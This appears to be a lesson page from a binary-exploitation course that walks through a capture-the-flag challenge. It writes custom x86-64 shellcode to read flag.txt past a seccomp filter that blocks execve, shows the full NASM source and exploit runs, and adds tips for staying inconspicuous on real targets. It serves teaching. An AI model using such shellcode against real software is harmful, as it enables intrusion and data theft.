BINEX: Stack Exploits · IronForgeCyber

Writing Shellcode

This challenge is very similar to Leaked Shellcode, with one major difference. Here, we'll practice writing our own shellcode for when Shellstorm doesn't have shellcode that does what we need.

First, we'll use Leaked Shellcode's exploit against this binary. When we run it:

[*] '/ironforge/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        PIE enabled
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
[+] Starting local process '/ironforge/chall': pid 94425
[*] buf: 0x7ffc92c37f40
[*] Switching to interactive mode
What do you want to write there?
Thank you!
[*] Got EOF while reading in interactive
$
[*] Interrupted
[*] Process '/ironforge/chall' stopped with exit code -31 (SIGSYS) (pid 94425)

We get SIGSYS. Using man 7 signal, we can see what this signal means:

SIGSYS       P2001      Core    Bad system call (SVr4);
                                       see also seccomp(2)

It points us to man 2 seccomp: seccomp can kill a process with SIGSYS when it makes a disallowed system call.

Running ldd on the binary (or reading the source code) confirms that seccomp is used:

libseccomp.so.2 => /lib/x86_64-linux-gnu/libseccomp.so.2 (0x00007fd56a622000)

Because of this, you may need to install libseccomp for this binary to run. This can be done with:

sudo apt-get install libseccomp-dev

seccomp allows a program to disable certain system calls. In this case, the binary has disabled execve and execveat, so our old exploit no longer works. We'll need to write our own.

Drafting Shellcode

First, we need to decide what the shellcode should do. Since we just need the contents of flag.txt, the shellcode can simply open the file and print it. In C, we would do something like:

FILE *fp = fopen("flag.txt", "r");
fgets(buffer, sizeof(buffer), fp);
puts(buffer);

These are libc functions. We could find them inside libc and call them directly, but this is difficult: because of ASLR, we would first need to learn the base address of libc. Instead, we can use system calls to do this. This would look something like:

int fd = open("flag.txt", O_RDONLY);
ssize_t n = read(fd, buffer, sizeof(buffer));
write(1, buffer, n); /* fd 1 is stdout */

Using the x64 syscall table, we can look up these system calls, their arguments, and their register values. x64 system calls use nearly the same register scheme as regular functions (rdi, rsi, rdx, then r10 in place of rcx, r8, r9), with the addition of rax holding the system call number.
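To make the register scheme concrete, here is a minimal Python sketch that maps a system call and its arguments onto registers. The helper name syscall_registers and the small lookup table are illustrative assumptions, not part of any library; the numbers are the Linux x86-64 values for the calls this write-up mentions.

```python
# Linux x86-64 system call numbers for the calls used in this write-up.
SYSCALL_NUMBERS = {
    "read": 0,
    "write": 1,
    "open": 2,
    "close": 3,
    "execve": 59,
    "exit": 60,
    "execveat": 322,
}

# Argument registers for the syscall instruction, in order.
ARG_REGISTERS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")


def syscall_registers(name, *args):
    """Return a dict of register -> value for a system call (hypothetical helper)."""
    if len(args) > len(ARG_REGISTERS):
        raise ValueError("a system call takes at most six arguments")
    registers = {"rax": SYSCALL_NUMBERS[name]}
    registers.update(zip(ARG_REGISTERS, args))
    return registers


if __name__ == "__main__":
    # open("flag.txt", O_RDONLY, 0): the pointer is shown symbolically.
    print(syscall_registers("open", "<ptr to flag.txt>", 0, 0))
```

The same lookup applies to every call in the shellcode: only rax and the first three argument registers change between open, read, and write.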

First, we must open the file. open has the following signature:

int open(const char *pathname, int flags);

We don't have our own place to store data, so we must use the stack. This becomes problematic because our instructions are also stored on the stack: push too much and you may overwrite your own instructions. This is especially critical in smaller spaces.

open takes a char* for the pathname, meaning we need an address that points to flag.txt. Since it's not already in the binary, we must introduce it into the shellcode. We do this by pushing it onto the stack and saving rsp.

mov rbx, 0x7478742e67616c66
push 0x0
push rbx
mov rdi, rsp

Why push 0x0?

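We need this string to be null-terminated, otherwise open will keep reading until it finds a null byte. Since flag.txt is exactly 8 characters, it fills the whole 8-byte register and leaves no room for the terminator, so we need an extra instruction to push the null byte first.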

You can pretty easily write a script that converts a string into this push instruction using Python.
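As a rough sketch of such a script, the function below splits a string into 8-byte chunks and emits the mov/push pairs in reverse order, since the stack grows downward. The name push_string and the choice of rbx as the scratch register are assumptions for illustration. When the string length is a multiple of 8, it emits the extra push 0x0 first; otherwise the zero padding in the last chunk acts as the terminator.

```python
def push_string(s: str, reg: str = "rbx") -> list[str]:
    """Return NASM lines that leave a null-terminated copy of s at rsp."""
    data = s.encode()
    lines = []
    if len(data) % 8 == 0:
        # No spare byte in the last chunk, so push a separate all-zero slot.
        lines.append("push 0x0")
    else:
        # Zero padding in the final chunk doubles as the terminator.
        data += b"\x00" * (8 - len(data) % 8)
    # Push the last chunk first so the string reads forward in memory.
    for i in range(len(data) - 8, -1, -8):
        value = int.from_bytes(data[i:i + 8], "little")
        lines.append(f"mov {reg}, {value:#x}")
        lines.append(f"push {reg}")
    return lines


if __name__ == "__main__":
    print("\n".join(push_string("flag.txt")))
```

For flag.txt this produces the same three instructions used in this write-up, only with push 0x0 listed before the mov, which makes no difference to the result. After the last push, mov rdi, rsp gives the pointer to the string.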

Then, we can load the other registers and call syscall:

; open("flag.txt", O_RDONLY, 0)
; mov al only sets the low byte, so this assumes the rest of rax is zero
mov al, 0x2
mov rbx, 0x7478742e67616c66
push 0x0
push rbx
mov rdi, rsp
xor rsi, rsi
xor rdx, rdx
syscall

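We'll need to store the return value of this call (rax) because it contains the file descriptor of the open file. This is where Caller vs. Callee Registers comes into play. We cannot leave it in a register that later system calls overwrite: rax receives each return value, the syscall instruction itself clobbers rcx and r11, and we reload rdi, rsi, and rdx with arguments. None of our system calls touch r10, so I chose r10 to hold the file descriptor.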

mov r10, rax

Then, we need to read bytes from the flag. We aren't told its length, so we will do this in a loop. We'll read a few bytes, write a few bytes, then check if we're at the end.

First, establish the buffer we'll write to:

push qword 0x0

Then, label our loop:

.loop:

Reading bytes. We'll use read which has the signature:

ssize_t read(int fd, void buf[.count], size_t count);

This is pretty simple to do:

; read(fd, rsp, 0x8)
mov rdi, r10
xor rax, rax
mov rsi, rsp
mov rdx, 0x8
syscall

Writing bytes. We'll use the return value of read to decide the number of bytes to write.

; write(1, rsp, rax)
; rsi still points at the buffer from the read
mov rdx, rax
mov rdi, 1
mov rax, 1
syscall

Finally, we must check if we're done. We can compare this return to 0x8 to see if we wrote 0x8 bytes.

cmp rax, 0x8
jl .done
jmp .loop

.done doesn't need anything under it because at this point, we'll have our flag.

Understanding Our Assumptions

I said a few things during that explanation that are worthy of explaining further.

Why use `r10` at all?

We need r10 because setting up the write system call overwrites rdi with the stdout file descriptor. Therefore, the flag.txt file descriptor must be stored elsewhere so we can reload it on each iteration.

Why didn't we just always write 8 bytes?

This choice is not obvious and required a bit of forethought. In the end, we need to compare the number of bytes read from the file descriptor (the return of read) to 0x8 (the intended read size). If we read less than this, we reached the end of the file.

If we chose to always write 0x8 bytes, write will always return 0x8 and our comparison would never work. Therefore, we choose to use read's return to write that many bytes and use write's return to check if we're at the end.

Another way to do this is to move the check between the read and write calls. We would need to change the check to only check for read returning 0, otherwise we'll miss a few bytes in the final write.
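The loop's control flow can be modeled in Python with os.read and os.write, which wrap the same system calls. This is only a sketch of the logic, not the shellcode itself; the function name dump and the CHUNK constant are illustrative.

```python
import os

CHUNK = 8  # same read size as the shellcode


def dump(fd_in: int, fd_out: int) -> int:
    """Copy fd_in to fd_out like the shellcode loop; return the iteration count."""
    iterations = 0
    while True:
        iterations += 1
        data = os.read(fd_in, CHUNK)      # rax = read(fd, rsp, 0x8)
        written = os.write(fd_out, data)  # rax = write(1, rsp, rax)
        if written < CHUNK:               # cmp rax, 0x8 / jl .done
            return iterations


if __name__ == "__main__":
    # Feed a placeholder flag through a pipe and copy it to stdout (fd 1).
    r, w = os.pipe()
    os.write(w, b"IFC{PL4C3H0LD3R_FL4G_H3R3!}\n")
    os.close(w)
    dump(r, 1)
```

One consequence of checking write's return: if the file length is an exact multiple of 8, the loop makes one extra pass in which read returns 0, write writes nothing and returns 0, and the comparison then ends the loop.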

Why don't we need anything in .done?

In this scenario, we don't need to do anything in .done because we'll already have the flag. What we'll notice at the end, however, is that the program will crash. This is because execution runs past the end of our shellcode into bytes that aren't valid instructions.

If we were attempting this against a real target and wanted to remain inconspicuous, we would do a few things depending on the situation:

Close the file descriptor. This is super easy:

mov rdi, r10
mov rax, 0x3 ; sys_close
syscall

Return execution state. This is not so easy. In a program like this, where we know nothing needs to run afterward, we can call sys_exit to exit the program cleanly.

xor rdi, rdi ; exit status 0
mov rax, 0x3c ; sys_exit
syscall

However, if we stole execution and the program was expected to do more (such as a reactor loop), we would want to return execution. This might involve storing the instruction and stack pointers using a trampoline. Coming soon we'll have a course on shellcoding that will cover this in more depth.

Running Our Shellcode

First, we need to assemble the shellcode into a flat binary.

nasm -f bin -o sc.bin sc.asm

Then, we can read this file into our exploit:

with open("sc.bin", "rb") as f:
	sc = f.read()

This replaces our old sc. This challenge has a slightly larger buffer, so we'll adjust the ljust to 0x58 bytes.

When we run it:

[*] '/ironforge/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        PIE enabled
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
[+] Starting local process '/ironforge/chall': pid 128923
[*] buf: 0x7ffe9aea2be0
[*] Switching to interactive mode
What do you want to write there?
Thank you!
IFC{PL4C[*] Got EOF while reading in interactive
$
[*] Process '/ironforge/chall' stopped with exit code -11 (SIGSEGV) (pid 128923)
[*] Got EOF while sending in interactive

It started to work but died! What we'll notice is that our shellcode doesn't fit the buffer:

$ wc -c sc.bin
76 sc.bin

Our buffer was only 72 bytes big! We need to make the shellcode smaller.
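One plausible way to see where the 72-byte limit comes from is to work out which bytes our own pushes overwrite. The sketch below rests on assumptions that are not confirmed by the challenge source: that the 0x58 passed to ljust is the offset of the saved return address from buf, and that execution starts at buf right after ret. The three pushes in the shellcode (push 0x0, push rbx, push qword 0x0) then land just below the old return address.

```python
SLOT = 8  # bytes per 64-bit stack slot


def first_clobbered_offset(ret_offset: int, pushes: int) -> int:
    """Offset from buf of the lowest byte that our own pushes overwrite."""
    rsp_after_ret = ret_offset + SLOT  # ret pops the saved return address
    return rsp_after_ret - pushes * SLOT


RET_OFFSET = 0x58  # assumed: the ljust width is the offset of the return address
PUSHES = 3         # push 0x0, push rbx, push qword 0x0

limit = first_clobbered_offset(RET_OFFSET, PUSHES)
for size in (76, 61):
    verdict = "fits" if size <= limit else "gets overwritten"
    print(f"{size}-byte shellcode, limit {limit}: {verdict}")
```

Under these assumptions, the 8-byte read buffer sits at offset 72, exactly where the last 4 bytes of the 76-byte shellcode (the jl and jmp) live. That would match the output above: the first 8 bytes of the flag print, then the overwritten jumps crash the program.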

Shortening Shellcode

As discussed in Assembly Instructions, instructions have various lengths. Most notable is the Register Extension (REX) prefix, which adds a byte to instructions that use 64-bit operands or the extended registers. Where possible, we'll shorten instructions by switching to smaller operands.

We can shorten every rax-related instruction by zeroing out the register at the beginning and only ever using the least-significant byte. We can do this on two assumptions:

We don't use any system calls that have large numbers or return large numbers. This holds here: open returns a small file descriptor, and read and write return a number <= 0x8.
The system calls we use don't fail and put negative values in rax. This can be a bold assumption, but more often than not it works in shellcoding. We wouldn't really do this if we were writing a program from scratch.

Then, we can change rdx in read and write to dl knowing that we zeroed out rdx before the open syscall. We also know that rdi only holds one byte because it holds a file descriptor, so we can change that, too.

When shortening all the registers, our assembly becomes:

org 0
bits 64

section .text
global _start

_start:
    ; Clear rax
    xor rax, rax

    ; open("flag.txt", O_RDONLY, 0)
    mov al, 0x2
    mov rbx, 0x7478742e67616c66
    push 0x0
    push rbx
    mov rdi, rsp
    xor rsi, rsi
    xor rdx, rdx
    syscall
    mov r10d, eax

    ; Buffer for writing
    push qword 0x0

.loop:

    ; rax = read(fd, rsp, 0x8)
    mov edi, r10d
    mov al, 0
    mov rsi, rsp
    mov dl, 0x8
    syscall

    ; write(1, rsp, rax); rsi still points at the buffer
    mov dl, al
    mov dil, 1
    mov al, 1
    syscall

    cmp al, 0x8
    jl .done

    jmp .loop

.done:

This shortens our assembly to 61 bytes, which fits into the buffer.
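The saving can be tallied instruction by instruction. The sketch below lists each instruction that changed size alongside a hand-assembled encoding; these byte strings are my own assumption of what NASM emits for each form and are worth confirming against a disassembly of sc.bin (for example with ndisasm -b 64 sc.bin).

```python
# (original, encoding, shortened, encoding) for each instruction that shrank.
PAIRS = [
    ("mov rdx, 0x8", "48c7c208000000", "mov dl, 0x8", "b208"),
    ("mov rdi, 1",   "48c7c701000000", "mov dil, 1",  "40b701"),
    ("mov rax, 1",   "48c7c001000000", "mov al, 1",   "b001"),
    ("cmp rax, 0x8", "4883f808",       "cmp al, 0x8", "3c08"),
    ("mov rdx, rax", "4889c2",         "mov dl, al",  "88c2"),
    ("xor rax, rax", "4831c0",         "mov al, 0",   "b000"),
]

# The shortened version adds one instruction: "xor rax, rax" at the top.
ADDED = bytes.fromhex("4831c0")


def bytes_saved(pairs) -> int:
    """Total bytes saved by swapping each original for its shortened form."""
    return sum(len(bytes.fromhex(old)) - len(bytes.fromhex(new))
               for _, old, _, new in pairs)


saved = bytes_saved(PAIRS)
new_size = 76 - saved + len(ADDED)
print(f"saved {saved} bytes, new size {new_size} bytes")
```

Note that mov r10d, eax and mov edi, r10d are no shorter than their 64-bit forms, because referencing r10 still requires a REX prefix. The same is true to a lesser degree of mov dil, 1, which keeps a REX byte to address dil.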

If we run this, we get:

[*] '/ironforge/chall'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        PIE enabled
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
[+] Starting local process '/ironforge/chall': pid 134755
[*] buf: 0x7ffcdf38c300
[*] Switching to interactive mode
What do you want to write there?
Thank you!
IFC{PL4C3H0LD3R_FL4G_H3R3!}
[*] Got EOF while reading in interactive
$
[*] Process '/ironforge/chall' stopped with exit code -11 (SIGSEGV) (pid 134755)
[*] Got EOF while sending in interactive

This yields our entire flag!
